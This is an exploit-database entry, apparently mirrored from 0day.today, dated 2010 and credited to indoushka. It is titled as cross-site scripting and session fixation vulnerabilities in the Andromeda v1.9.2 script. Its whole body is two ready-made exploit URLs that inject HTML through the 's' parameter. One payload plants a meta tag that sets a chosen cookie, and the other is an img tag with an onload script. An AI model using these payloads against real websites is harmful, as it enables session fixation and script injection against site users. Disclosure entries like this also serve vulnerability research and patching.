id: 9632
date: 03/15/2010
title: Andromeda 's' Parameter Cross Site Scripting and Session Fixation Vuln
author: indoushka
cves: 

=================================================================================
Andromeda 's' Parameter Cross Site Scripting and Session Fixation Vulnerabilities
=================================================================================

Exploit:

http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<img+src=http://www.example.com/1.JPG+onload=alert(00213771818860)>



#  0day.today [2023-03-27]  #